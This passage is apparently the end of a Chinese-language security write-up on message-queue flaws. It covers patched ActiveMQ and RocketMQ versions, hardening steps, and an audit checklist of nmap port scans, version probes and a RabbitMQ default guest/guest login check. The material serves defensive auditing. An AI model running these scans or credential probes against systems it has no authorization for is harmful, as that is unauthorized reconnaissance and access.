- Apache ActiveMQ → 5.18.3+ / 5.17.6+ / 5.16.7+ / 5.15.16+
- Apache RocketMQ → 5.1.1+
- 网络隔离:所有消息队列管理端口禁止直接暴露到互联网
- 修改默认凭据:RabbitMQ 立即修改 guest/guest,禁用或限制 guest 账号
- JMX 加固:Kafka JMX 端口启用认证,配置
com.sun.management.jmxremote.authenticate=true
9.2 排查清单
# 1. 扫描暴露在互联网上的消息队列端口
nmap -sV -p 61616,8161,15672,5672,9999,9876,9092,10911 <target_range>
# 2. 检查 ActiveMQ 版本
curl -s http://target:8161/api/jolokia/version | jq .value.version
# 3. 检查 RabbitMQ 默认凭据
curl -s -u guest:guest http://target:15672/api/overview
# 4. 检查 Kafka JMX 认证
echo "env | grep JMX" # 在 Kafka 服务器上检查 JMX 配置
# 5. 检查 RocketMQ 版本
curl -s http://target:10911/api/getAllTopicConfig
# 6. 检查 Kafka ACL 配置
kafka-acls.sh --bootstrap-server target:9092 --list
# 7. 检查消息队列进程连接
ss -tlnp | grep -E '61616|15672|9999|9876|9092'
9.3 中期加固
- 启用认证:所有消息队列启用强认证机制(SASL/SCRAM、mTLS)
- 最小权限:为每个应用分配独立的账号和 ACL 规则,禁止共享凭据
- 传输加密:启用 TLS 加密消息传输,防止中间人窃听和篡改
- 审计日志:开启消息队列的审计日志,记录所有连接和管理操作
- 监控告警:部署针对消息队列的异常行为监控,包括异常连接、大量消息消费、配置变更等
- 定期轮换:定期轮换消息队列的认证凭据和 SSL 证书
0x0A 参考资料